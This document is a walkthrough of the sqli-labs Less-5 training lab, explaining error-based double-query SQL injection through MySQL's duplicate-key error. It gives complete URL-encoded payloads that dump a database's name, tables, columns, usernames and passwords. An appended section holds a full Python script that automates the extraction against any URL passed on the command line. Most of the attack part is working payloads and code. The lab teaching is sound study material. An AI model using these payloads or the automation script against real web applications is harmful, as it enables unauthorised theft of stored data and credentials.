sqli-labs Level 5 (Less-5)
阿新 • Published: 2020-10-11
Whoa, level five already. Naive me thought it would follow the same approach as the previous levels.
I foolishly tried a round of blind injection, and none of it worked. Ugh, in the end I had to look at an expert's writeup.
It really is different; even the challenge title is different: Double Injection (double query injection).
Let's first get familiar with the double query. Put simply, it is a nested select: one select with another query nested inside it. The nested statement is called a subquery. For example:
select concat((select database()));
To explain: the inner part executes first, then the outer part. That is, select database() runs first and its result is then fed into the outer concat().
Before tackling the Level 5 injection, we also need to know a few functions and clauses:
1. count(): an aggregate function; here it counts the rows in each group.
2. rand(): returns a random floating-point value v with 0 <= v < 1 (not an integer); floor(rand()*2) is therefore always 0 or 1.
3. group by: groups the rows returned by the query, here by the alias a.
4. floor(): rounds a value down to the nearest integer.
5. concat(): joins strings; here it glues the subquery result to the floor(rand()*2) digit.
Why this leaks data: MySQL evaluates the GROUP BY expression once when it looks up a group in its temporary table and again when it inserts a new group. Because the key contains rand(), those two evaluations can disagree, so an insert can collide with a key that already exists and MySQL aborts with "Duplicate entry '...' for key 'group_key'", quoting the key, and with it our subquery result, in the error text. Less-5 prints the MySQL error to the page, which is exactly what this technique depends on.
OK, enough talk; let's go find the answers in the challenge itself.
Start injecting; dump the database name:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20%20union%20select%20null,count(*),concat((select%20database()),floor(rand()*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a--+
The first time I ran it, for some reason nothing showed up. It appeared when I refreshed for the third time.
Next, dump the table names:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
That is the first table; next we dump the second:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
Third table:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%202,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
Fourth table:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%203,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
Start dumping column names. Note that the filter is table_name='users' with no table_schema condition, so it matches the users table of every database on the server; that is why the columns of security.users only show up at offsets 12 and 13 here. Adding and table_schema='security' to the where clause makes them start at limit 0,1.
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%2012,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
Second column:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%2013,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
And that dumps them out.
Finally the data; dump it:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
That is the first one, the username; next, the password:
http://10.0.68.185/sqli-labs-master/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20password%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23
Finally everything is out.
If nothing comes out when you inject, don't panic; send the request again and refresh a few times. The reason is that rand() is unseeded, so whether the group key collides is decided afresh on each request and the duplicate-key error only appears some of the time. Using floor(rand(0)*2) instead gives a fixed sequence, and the error then fires on every request as long as the table in the from clause has at least three rows.
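The whole procedure above (database, tables, columns, then rows) automated in one script. This is an added example, not code from the original post or from sqli-labs. It assumes a Less-5 instance that echoes mysql_error() to the page (as the lesson does) and takes a hypothetical base URL on the command line; the FAKE_RESULTS values are constructed data for an offline dry run. It departs from the post's payloads in two small ways: a `~` (0x7e) separator is placed before the floor() digit so the leaked value can be cut out unambiguously, and an optional rand(0) seed makes the error fire on every request instead of needing refreshes.

```python
# Added example: automates the Less-5 double-query extraction shown above.
# Assumes a Less-5 instance that echoes mysql_error() (as the lesson does); the
# base URL is hypothetical and given on the command line.  Stdlib only.
import html
import re
import sys
import urllib.parse
import urllib.request

# MySQL's duplicate-key error: 5.x names the key 'group_key', 8.0 '<group_key>'.
# The payload puts '~' (0x7e) between the leaked value and the floor() digit so
# the value can be cut out unambiguously even when it ends in 0 or 1.
DUP_RE = re.compile(r"Duplicate entry '(.*?)~[01]' for key '<?group_key>?'")


def build_payload(subquery, seed=False):
    """id= value for one probe; subquery is a scalar SELECT returning a string.

    seed=True uses rand(0), whose sequence is fixed, so the collision happens
    on every request instead of only sometimes (the post uses plain rand()).
    """
    rnd = "rand(0)" if seed else "rand()"
    return (f"1' union select null,count(*),concat(({subquery}),0x7e,"
            f"floor({rnd}*2)) as a from information_schema.tables group by a#")


def make_url(base_url, subquery, seed=False):
    """quote() encodes ' as %27 and the trailing # as %23, as in the post's URLs."""
    return base_url + "?id=" + urllib.parse.quote(build_payload(subquery, seed))


def extract_leaked_value(page):
    """The subquery result carried in the error text, or None if no error."""
    m = DUP_RE.search(html.unescape(page))
    return m.group(1) if m else None


def http_get(url):
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def leak(base_url, subquery, tries=8, seed=False, fetch=http_get):
    """Resend the probe until the duplicate-key error leaks a value (None if never)."""
    for _ in range(tries):
        value = extract_leaked_value(fetch(make_url(base_url, subquery, seed)))
        if value is not None:
            return value
    return None


def enumerate_rows(base_url, expr, from_clause, max_rows=64, **kw):
    """Step 'limit N,1' for N = 0, 1, ... as the post does by hand.  Past the
    last row the subquery is NULL, so the key never collides and no error
    comes back, which ends the walk."""
    rows = []
    for n in range(max_rows):
        value = leak(base_url, f"select {expr} from {from_clause} limit {n},1", **kw)
        if value is None:
            break
        rows.append(value)
    return rows


# Constructed stand-in for a Less-5 instance (made-up values, offline dry run only).
FAKE_RESULTS = {
    "select database()": "security",
    "select table_name from information_schema.tables where table_schema='security' limit 0,1": "emails",
    "select table_name from information_schema.tables where table_schema='security' limit 1,1": "users",
}


def fake_fetch(url):
    """Behave like Less-5: echo the duplicate-key error for subqueries it 'knows'."""
    payload = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)["id"][0]
    sub = payload.split("concat((", 1)[1].split("),0x7e", 1)[0]
    if sub in FAKE_RESULTS:
        return f"Duplicate entry '{FAKE_RESULTS[sub]}~1' for key 'group_key'"
    return "<h1>Welcome Dhakkan</h1>"  # normal page, nothing leaked


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: less5_dump.py http://HOST/sqli-labs-master/Less-5/")
    base, opts = sys.argv[1], {"seed": True}
    db = leak(base, "select database()", **opts) or sys.exit("no duplicate-key error came back; is error display on?")
    print("database:", db)
    print("tables:", enumerate_rows(base, "table_name",
          f"information_schema.tables where table_schema='{db}'", **opts))
    print("users columns:", enumerate_rows(base, "column_name",
          f"information_schema.columns where table_schema='{db}' and table_name='users'", **opts))
    print("users rows:", enumerate_rows(base, "concat(username,0x3a,password)", "users", **opts))
```

Run it as `python less5_dump.py http://10.0.68.185/sqli-labs-master/Less-5/` against your own lab; `leak(..., fetch=fake_fetch)` drives the same code path offline against the constructed responses. Filtering the columns query by table_schema avoids the offset-12 guessing the post ran into, and the rand(0) seed removes the need to refresh.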